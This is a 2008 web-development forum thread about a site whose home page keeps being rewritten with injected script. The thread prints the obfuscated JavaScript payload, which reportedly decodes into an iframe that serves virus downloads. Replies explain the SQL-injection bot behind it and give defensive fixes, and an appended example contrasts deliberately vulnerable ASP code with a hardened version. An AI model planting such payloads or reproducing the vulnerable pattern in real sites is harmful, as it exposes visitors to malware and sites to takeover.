Bytes | Software Development & Data Engineering Community

new type of injection? rewrite default document?

This is weird. I'm pretty familiar with SQL injection, but we're getting
these weird injections that write into the default document or home page.
What it's doing is putting script code at the top or bottom of the home
page... it looks something like this:

<script>function xy1q4877d47d91a36(q4877d47d92209){ function q4877d47d929d5
() {return 16;} return (parseInt(q4877d47d92209,q4877d47d929d5()));}function
q4877d47d93974(q4877d47d94144){ var q4877d47d95c9b=2; var
q4877d47d94d7f='';q4877d47d96c3a=String.fromCharCode;for(q4877d47d954cc=0;q4877d47d954cc<q4877d47d94144.length;q4877d47d954cc+=q4877d47d95c9b){
q4877d47d94d7f+=(q4877d47d96c3a(xy1q4877d47d91a36(q4877d47d94144.substr(q4877d47d954cc,q4877d47d95c9b))));}return
q4877d47d94d7f;} var
q4877d47d9740a='3C7363726970743E696628216D79696129 7B646F63756D656E742E777269746528756E65736361706528 20272533632536392536362537322536312536642536352532 30253733253732253633253364253237253638253734253734 25373025336125326625326625373425373225373525363525 37322536392536652536372537342536662536652536352537 33253265253665253635253734253266253733253635253631 25373225363325363825326525363325363725363925336625 36322536312536312536372536392537322536632625323725 32622534642536312537342536382532652537322536662537 35253665253634253238253464253631253734253638253265 25373225363125366525363425366625366425323825323925 32612533352533352533352533362533372532392532622532 37253634253335253332253338253237253230253737253639 25363425373425363825336425333125333825333125323025 36382536352536392536372536382537342533642533332533 30253337253230253733253734253739253663253635253364 25323725363425363925373325373025366325363125373925 33612532302536652536662536652536352532372533652533 63253266253639253636253732253631253664253635253365 2729293B7D766172206D7969613D747275653B3C2F73637269 70743E';document.write(q4877d47d93974(q4877d47d974 0a));</script>

What it's doing is decoding itself into an iframe that links out to popups
that try to download a virus onto your machine. I don't get the popup
on my machine because I think I have a newer version of IE. But some
people have complained that it is installing a virus on their machine.

Also, what is crazy is when I replace the file with a good version: in
about 30 mins, it is automatically overwritten with the infected version.
Also, I've noticed it on some other websites that I haven't touched.

Has anyone encountered this before? I'm stumped as to the cause of
it. I don't see the issue on our dev server. It seems to be IIS on a
shared host.

Brian
Jul 11 '08 #1
2 1888
It would seem you have a virus on your machine that is adding the code.

This is just a thought, I don't know if it will work, but try auditing access
to the file. Maybe then you can at least see what user the virus is running
under. Look in your task manager for the processes that are running.

"Brian Bozarth" <br***@spaceboyinteractive.com> wrote in message
news:eR**************@TK2MSFTNGP02.phx.gbl...
Jul 13 '08 #2
Brian Bozarth wrote:
This is weird, I'm pretty familiar with SQL Injection - but we're
getting these weird injection that is writing in the default document or
home page. What it's doing is putting in script code at the top or bottom of
the home page... it looks something like this:
Browse through the several threads about sql injection that have been posted
in the last couple weeks. You should find posts that mention these links:

http://www.aspmessageboard.com/forum...997&P=1#894984
http://isc.sans.org/diary.html?n&storyid=4294
http://blogs.technet.com/neilcar/arc...rt-2-meat.aspx

In a nutshell, you've been attacked by a bot that uses google to find sites
that might be vulnerable to sql injection, based on the use of querystrings
in the urls. It then runs through a scripted routine to find the
vulnerabilities in the sites, and if they exist, uses those vulnerabilities
to insert those script tags you are seeing into every table in your
database. Since your code is likely to be writing data retrieved from the
database to Response without validating or encoding it, it's really your
code that is inserting the script tags into your pages.

So the first thing you should do is check the data in your database. If
corrupt, take it offline and restore a backup, or run a stored procedure
which was posted by Old Pedant to attempt to cleanse it. Then, go through
your server-side code with a fine tooth comb and

1. Make your code impervious to sql injection by eliminating all use of
dynamic sql, using parameters instead.
See here for a better, more secure way to execute your queries by using
parameter markers:
http://groups-beta.google.com/group/...e36562fee7804e

Personally, I prefer using stored procedures, or saved parameter queries as
they are known in Access:

Access:
http://www.google.com/groups?hl=en&l...TNGP12.phx.gbl
http://groups.google.com/groups?hl=e...tngp13.phx.gbl

SQL Server:
http://groups.google.com/group/micro...9dc1701?hl=en&

2. Use Server.HTMLEncode when writing data to Response

--
Microsoft MVP - ASP/ASP.NET
Please reply to the newsgroup. This email account is my spam trap so I
don't check it very often. If you must reply off-line, then remove the
"NO SPAM"
Jul 13 '08 #3
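As an added illustration of the two steps in the reply above (not code from this thread or from the poster), here is a classic ASP page in the dynamic-SQL, raw-Response shape the reply describes, followed by the parameterised, HTML-encoded replacement. The open ADODB.Connection `conn`, the `articles` table and its `id`/`title`/`body` columns are assumed.

```asp
<%
' Assumed: conn is an open ADODB.Connection; articles(id integer, title, body).
' ADO constants normally pulled in from adovbs.inc.
Const adInteger = 3
Const adParamInput = 1

' BEFORE: the querystring is concatenated straight into the SQL, so a crafted
' id value can append further statements, and whatever the table now holds
' (including an inserted <script> tag) is written to the browser unencoded.
Sub ShowArticleVulnerable(conn)
    Dim rs
    Set rs = conn.Execute("SELECT title, body FROM articles WHERE id = " & _
                          Request.QueryString("id"))
    Response.Write "<h1>" & rs("title") & "</h1>" & rs("body")
    rs.Close
End Sub

' AFTER: step 1 (parameter marker instead of dynamic SQL) and
'        step 2 (Server.HTMLEncode on everything written to Response).
Sub ShowArticleHardened(conn)
    Dim cmd, rs, id
    ' Reject anything that is not a number before it reaches the database.
    If Not IsNumeric(Request.QueryString("id")) Then
        Response.Status = "400 Bad Request"
        Response.End
    End If
    id = CLng(Request.QueryString("id"))

    Set cmd = Server.CreateObject("ADODB.Command")
    Set cmd.ActiveConnection = conn
    cmd.CommandText = "SELECT title, body FROM articles WHERE id = ?"
    cmd.Parameters.Append cmd.CreateParameter("id", adInteger, adParamInput, , id)
    Set rs = cmd.Execute

    If Not rs.EOF Then
        ' Even if a row was already tampered with, the stored tag reaches the
        ' browser as &lt;script&gt; and is displayed rather than executed.
        Response.Write "<h1>" & Server.HTMLEncode(rs("title")) & "</h1>"
        Response.Write Server.HTMLEncode(rs("body"))
    End If
    rs.Close
End Sub
%>
```

Step 1 stops new rows from being altered through this page; step 2 is what keeps rows already poisoned by the bot from reaching visitors as live script while the database is being cleaned.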